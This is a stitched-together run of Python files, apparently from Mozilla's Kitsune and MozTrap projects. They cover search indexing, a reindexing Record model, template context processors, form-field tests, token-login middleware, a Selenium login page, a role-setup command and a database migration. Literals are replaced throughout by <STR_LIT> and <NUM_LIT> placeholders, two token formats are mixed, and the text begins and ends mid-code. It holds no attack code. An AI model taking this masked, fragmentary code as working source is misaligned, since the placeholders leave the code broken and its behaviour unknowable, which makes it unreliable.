ES_LIVE_INDEXING : <EOL> return <EOL> try : <EOL> super ( SearchMappingType , cls ) . 
            # NOTE(review): tail of a method whose ``try:`` starts before this
            # chunk — unindexing errors for missing documents are deliberately
            # ignored (best-effort cleanup).
            unindex(*args, **kwargs)
        except NotFoundError:
            pass

    @classmethod
    def morelikethis(cls, id_, s, fields):
        """<STR_LIT>"""
        # Run a more-like-this query with the loosest frequency thresholds so
        # even rare terms can contribute matches.
        return list(MLT(id_, s, fields, min_term_freq=<NUM_LIT:1>, min_doc_freq=<NUM_LIT:1>))


def _identity(s):
    # Default ``instance_to_indexee`` translator: the saved instance is
    # itself the thing to (un)index.
    return s


def register_for_indexing(app,
                          sender_class,
                          instance_to_indexee=_identity,
                          m2m=False):
    """<STR_LIT>"""
    def maybe_call_method(instance, is_raw, method_name):
        """<STR_LIT>"""
        # Skip raw saves (e.g. fixture loading) and instances that map to
        # nothing indexable.
        obj = instance_to_indexee(instance)
        if obj is not None and not is_raw:
            getattr(obj, method_name)()

    def update(sender, instance, **kw):
        """<STR_LIT>"""
        maybe_call_method(instance, kw.get('<STR_LIT>'), '<STR_LIT>')

    def delete(sender, instance, **kw):
        """<STR_LIT>"""
        maybe_call_method(instance, kw.get('<STR_LIT>'), '<STR_LIT>')

    def indexing_receiver(signal, signal_name):
        """<STR_LIT>"""
        # ``weak=False`` keeps the closure alive; the dispatch_uid makes
        # repeated registration for the same (app, model, signal) idempotent.
        return receiver(
            signal,
            sender=sender_class,
            dispatch_uid='<STR_LIT>' %
            (app, sender_class.__name__, signal_name),
            weak=False)

    if m2m:
        indexing_receiver(m2m_changed, '<STR_LIT>')(update)
    else:
        indexing_receiver(post_save, '<STR_LIT>')(update)
        # When a translator maps the deleted instance onto some other object,
        # that object should be re-indexed (updated), not removed.
        indexing_receiver(pre_delete, '<STR_LIT>')(
            delete if instance_to_indexee is _identity else update)


def register_mapping_type(cls):
    """<STR_LIT>"""
    # Class decorator: record the mapping type in the module-level registry
    # keyed by its declared mapping-type name.
    _search_mapping_types[cls.get_mapping_type_name()] = cls
    return cls


def generate_tasks(**kwargs):
    """<STR_LIT>"""
    # Drain the request-local task queue at end of request, running each
    # deferred callable exactly once.
    tasks = _local_tasks()
    for fun, args in tasks:
        fun(*args)
    tasks.clear()


signals.request_finished.connect(generate_tasks)


class RecordManager(models.Manager):
    def outstanding(self):
        """<STR_LIT>"""
        # Records that are new or still in progress.
        return self.filter(status__in=Record.STATUS_OUTSTANDING)


class Record(ModelBase):
    """<STR_LIT>"""
    # Lifecycle states for a (re)indexing run.
    STATUS_NEW = <NUM_LIT:0>
    STATUS_IN_PROGRESS = <NUM_LIT:1>
    STATUS_FAIL = <NUM_LIT:2>
    STATUS_SUCCESS = <NUM_LIT:3>
    STATUS_CHOICES = (
        (STATUS_NEW, '<STR_LIT>'),
        (STATUS_IN_PROGRESS, '<STR_LIT>'),
        (STATUS_FAIL, '<STR_LIT>'),
        (STATUS_SUCCESS, '<STR_LIT>'),
    )
    # States considered "not finished" by RecordManager.outstanding().
    STATUS_OUTSTANDING = [STATUS_NEW, STATUS_IN_PROGRESS]

    batch_id = models.CharField(max_length=<NUM_LIT:10>)
    name = models.CharField(max_length=<NUM_LIT:255>)
    creation_time = models.DateTimeField(auto_now_add=True)
    start_time = models.DateTimeField(null=True)
    end_time = models.DateTimeField(null=True)
    status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_NEW)
    message = models.CharField(max_length=<NUM_LIT:255>, blank=True)
    objects = RecordManager()

    class Meta:
        ordering = ['<STR_LIT>']
        permissions = (
            ('<STR_LIT>', '<STR_LIT>'),
        )

    def delta(self):
        """<STR_LIT>"""
        # Elapsed run time, or None if the record never started or finished.
        if self.start_time and self.end_time:
            return self.end_time - self.start_time
        return None

    def _complete(self, status, msg='<STR_LIT>'):
        # Stamp the end time and final status; callers are responsible for
        # saving.
        self.end_time = datetime.datetime.now()
        self.status = status
        self.message = msg

    def mark_fail(self, msg):
        """<STR_LIT>"""
        # Truncate to the message column's max_length before saving.
        self._complete(self.STATUS_FAIL, msg[:<NUM_LIT:255>])
        self.save()

    def mark_success(self, msg='<STR_LIT>'):
        """<STR_LIT>"""
        self._complete(self.STATUS_SUCCESS, msg[:<NUM_LIT:255>])
        self.save()

    def __unicode__(self):
        return '<STR_LIT>' % (self.batch_id, self.name, self.status)


class Synonym(ModelBase):
    """<STR_LIT>"""
    # Comma/space-delimited word lists mapped onto each other at search
    # time — presumably consumed by the search engine's synonym filter;
    # TODO confirm against the indexing code.
    from_words = models.CharField(max_length=<NUM_LIT>)
    to_words = models.CharField(max_length=<NUM_LIT>)

    def __unicode__(self):
        return u'<STR_LIT>'.format(self.from_words, self.to_words)
from django.conf import settings
from django.utils import translation

from kitsune.questions.models import QuestionLocale


def global_settings(request):
    """<STR_LIT>"""
    # Make the settings object available in every template context.
    return {'<STR_LIT>': settings}


def i18n(request):
    # Prefer the URL-map spelling of the active language; fall back to the
    # raw language code when it has no entry in LANGUAGE_URL_MAP.
    active = translation.get_language()
    language = settings.LANGUAGE_URL_MAP.get(active) or active
    if translation.get_language_bidi():
        direction = '<STR_LIT>'
    else:
        direction = '<STR_LIT>'
    return {'<STR_LIT>': language,
            '<STR_LIT>': direction}


def aaq_languages(request):
    """<STR_LIT>"""
    return {'<STR_LIT>': QuestionLocale.objects.locales_list()}
from django import forms
from nose.tools import eq_
from pyquery import PyQuery as pq

from kitsune.sumo.form_fields import StrippedCharField
from kitsune.sumo.tests import TestCase


class ExampleForm(forms.Form):
    """<STR_LIT>"""
    # One field per widget flavour under test, so TestFields can assert on
    # the HTML attributes each widget renders with.
    char = forms.CharField(max_length=<NUM_LIT:10>)
    char_optional = forms.CharField(required=False,
                                    widget=forms.TextInput())
    # NOTE(review): ``file`` and ``bool`` shadow builtins; kept because the
    # tests below reference the fields by these names.
    file = forms.FileField(max_length=<NUM_LIT:10>)
    choice = forms.ChoiceField(choices=((<NUM_LIT:1>, <NUM_LIT:1>), (<NUM_LIT:2>, <NUM_LIT:2>)))
    stripped_char = StrippedCharField(max_length=<NUM_LIT:10>)
    bool = forms.BooleanField()
    textarea = StrippedCharField(widget=forms.Textarea())
    email = forms.EmailField()
    url = forms.URLField(required=False)
    date = forms.DateField()
    time = forms.TimeField()


class TestFields(TestCase):
    """<STR_LIT>"""

    def setUp(self):
        self.f = ExampleForm()

    def _attr_eq(self, field, attr, value):
        # Render the bound field to HTML and compare a single attribute of
        # the resulting element (None means the attribute is absent).
        doc = pq(str(self.f[field]))
        eq_(value, doc.attr(attr))

    def test_char_field(self):
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_char_optional_field(self):
        # Optional fields should not render the attribute at all.
        self._attr_eq('<STR_LIT>', '<STR_LIT>', None)

    def test_file_field(self):
        self._attr_eq('<STR_LIT:file>', '<STR_LIT>', '<STR_LIT>')
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_choice_field(self):
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_stripped_char_field(self):
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_bool_field(self):
        self._attr_eq('<STR_LIT:bool>', '<STR_LIT>', '<STR_LIT>')

    def test_textarea_field(self):
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        self._attr_eq('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_email_field(self):
        self._attr_eq('<STR_LIT:email>', '<STR_LIT:type>', '<STR_LIT:email>')
        self._attr_eq('<STR_LIT:email>', '<STR_LIT>', '<STR_LIT>')

    def test_url_field(self):
        self._attr_eq('<STR_LIT:url>', '<STR_LIT:type>', '<STR_LIT:url>')
        self._attr_eq('<STR_LIT:url>', '<STR_LIT>', None)

    def test_date_field(self):
        self._attr_eq('<STR_LIT:date>', '<STR_LIT:type>', '<STR_LIT:date>')
        self._attr_eq('<STR_LIT:date>', '<STR_LIT>', '<STR_LIT>')

    def test_time_field(self):
        self._attr_eq('<STR_LIT:time>', '<STR_LIT:type>', '<STR_LIT:time>')
        self._attr_eq('<STR_LIT:time>', '<STR_LIT>', '<STR_LIT>')
<s> """<STR_LIT>""" <EOL> from taggit . models import Tag <EOL> def add_existing_tag ( tag_name , tag_manager ) : <EOL> """<STR_LIT>""" <EOL> tag = Tag . objects . get ( name__iexact = tag_name ) <EOL> tag_manager . add ( tag ) <EOL> return tag . name </s>
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _lazy

from kitsune.sumo.urlresolvers import reverse


class TokenLoginMiddleware(object):
    """<STR_LIT>"""

    def process_request(self, request):
        # Reading the query string can raise IOError (client disconnect);
        # treat that as "no token supplied".
        try:
            auth = request.GET.get('<STR_LIT>')
        except IOError:
            return
        # Nothing to do without a token, or when someone is already logged in.
        if auth is None:
            return
        if request.user and request.user.is_authenticated():
            return
        user = authenticate(auth=auth)
        if not (user and user.is_active):
            return
        login(request, user)
        messages.success(request, _lazy(u'<STR_LIT>'))


class LogoutDeactivatedUsersMiddleware(object):
    """<STR_LIT>"""

    def process_request(self, request):
        user = request.user
        # Only act on authenticated-but-deactivated users.
        if not user.is_authenticated() or user.is_active:
            return
        # A session flag exempts this request from the forced logout.
        if request.session.get('<STR_LIT>', False):
            return
        logout(request)
        response = HttpResponseRedirect(reverse('<STR_LIT>'))
        response.delete_cookie(settings.SESSION_EXISTS_COOKIE)
        return response
from django.core.validators import RegexValidator

# Validator for Twitter handles, applied wherever a model/form field stores
# one. NOTE(review): the pattern, error message, and error code are masked
# placeholders in this corpus, so the exact handle format cannot be read here.
TwitterValidator = RegexValidator(r'<STR_LIT>',
                                  message='<STR_LIT>',
                                  code='<STR_LIT>')
import jinja2
from django_jinja import library

from kitsune.sumo import parser
from kitsune.wiki.diff import BetterHtmlDiff


@library.global_function
def diff_table(content_from, content_to):
    """<STR_LIT>"""
    # Diff the two texts line-by-line and render the HTML comparison table,
    # marked safe for template output.
    differ = BetterHtmlDiff()
    table = differ.make_table(
        content_from.splitlines(), content_to.splitlines(), context=True)
    return jinja2.Markup(table)


@library.global_function
def generate_video(v):
    # Delegate to the wiki parser's video markup generator; the result is
    # pre-rendered HTML, hence Markup.
    return jinja2.Markup(parser.generate_video(v))
import os

# Repository root: two directories above this file.
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


def path(components):
    """Join *components* onto the repository root.

    :arg components: iterable of path segments.
    :returns: the joined path rooted at ``ROOT``.
    """
    return os.path.join(ROOT, *components)


if __name__ == '<STR_LIT:__main__>':
    # Imported lazily so that importing this module for ``path()`` does not
    # require the third-party ``dennis`` package to be installed.
    from dennis.cmdline import click_run
    click_run()
from pages.desktop.base import Base

from selenium.webdriver.common.by import By


class LoginPage(Base):
    """<STR_LIT>"""

    URL_TEMPLATE = '<STR_LIT>'

    _page_title = '<STR_LIT>'
    _username_box_locator = (By.ID, '<STR_LIT>')
    _password_box_locator = (By.ID, '<STR_LIT>')
    _log_in_button_locator = (By.CSS_SELECTOR, "<STR_LIT>")
    _login_error_locator = (By.CSS_SELECTOR, '<STR_LIT>')
    _logged_in_as_div_locator = (By.CSS_SELECTOR, '<STR_LIT>')
    _logged_in_text = '<STR_LIT>'

    def log_in(self, username, password):
        # Fill in the credentials and submit the form.
        find = self.selenium.find_element
        find(*self._username_box_locator).send_keys(username)
        find(*self._password_box_locator).send_keys(password)
        find(*self._log_in_button_locator).click()
        # If the header does not show a logged-in user, surface the on-page
        # error message in the assertion.
        if not self.header.is_user_logged_in:
            error_text = find(*self._login_error_locator).text
            raise AssertionError("<STR_LIT>" % username + error_text)
<s> """<STR_LIT>""" <EOL> from django . core . management . base import NoArgsCommand <EOL> from moztrap . model . core . auth import Role , Permission <EOL> ROLES = { } <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> ROLES [ "<STR_LIT>" ] = [ <EOL> "<STR_LIT>" , <EOL> ] + ROLES [ "<STR_LIT>" ] <EOL> class Command ( NoArgsCommand ) : <EOL> help = ( "<STR_LIT>" ) <EOL> def handle_noargs ( self , ** options ) : <EOL> verbosity = int ( options . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> for role_name , perms in ROLES . iteritems ( ) : <EOL> role , created = Role . objects . get_or_create ( name = role_name ) <EOL> if not created : <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % role_name ) <EOL> continue <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % role_name ) <EOL> for perm_label in perms : <EOL> app_label , codename = perm_label . split ( "<STR_LIT:.>" ) <EOL> try : <EOL> perm = Permission . objects . get ( <EOL> content_type__app_label = app_label , <EOL> codename = codename ) <EOL> except Permission . DoesNotExist : <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % perm_label ) <EOL> continue <EOL> role . permissions . add ( perm ) <EOL> if verbosity : <EOL> print ( "<STR_LIT>" % perm_label ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : 
'<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : 